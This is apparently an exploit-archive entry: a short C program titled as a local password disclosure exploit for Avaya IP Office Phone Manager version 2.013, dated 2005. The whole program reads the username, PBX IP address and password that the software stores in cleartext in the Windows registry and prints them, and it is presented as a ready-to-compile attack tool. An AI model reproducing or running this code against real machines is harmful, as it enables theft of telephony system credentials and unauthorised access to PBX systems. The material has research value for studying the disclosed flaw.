Avaya IP Office Phone Manager Local Password Disclosure Exploit

#include <windows.h> #include <stdio.h> #include <string.h> /* Filename: exploit.c Title: Avaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability Exploit v0.01 Author: pagvac (Adrian Pastor) Date: 24th Feb, 2005 Other info: tested on version 2.013. Compile as a Win32 console application project in Visual C++ */ BOOL QueryVal(char lszVal2Query[255], char lszValData[255]) { char lszResult[255]; HKEY hKey; LONG returnStatus; DWORD dwType=REG_SZ; DWORD dwSize=255; returnStatus = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\AVAYA\\IP400\\GENERIC", 0L, KEY_READ, &hKey); if (returnStatus == ERROR_SUCCESS) { returnStatus = RegQueryValueEx(hKey, lszVal2Query, NULL, &dwType,(LPBYTE)&lszResult, &dwSize); if (returnStatus == ERROR_SUCCESS) { strcpy(lszValData, lszResult); } RegCloseKey(hKey); return TRUE; } else { RegCloseKey(hKey); return FALSE; } } void main() { char valData[255]; printf("\nAvaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability Exploit\n"); printf("By pagvac (Adrian Pastor)\n"); printf("Tested on version 2.013\n\n"); // Print username printf("Username:\t"); if(!QueryVal("UserName", valData)) printf("Error! No permissions to read key value?\n"); else printf("%s\n", valData); // Print IP address printf("PBX IP Address:\t"); if(!QueryVal("PBXAddress", valData)) printf("Error! No permissions to read key value?\n"); else printf("%s\n", valData); // Print password printf("Password:\t"); if(!QueryVal("Password", valData)) printf("Error! No permissions to read key value?\n"); else { if(strcmp(valData, "")==0) printf("[blank password]\n\n"); else { printf("%s\n", valData); printf("Password obsfucated?\n\n"); } } }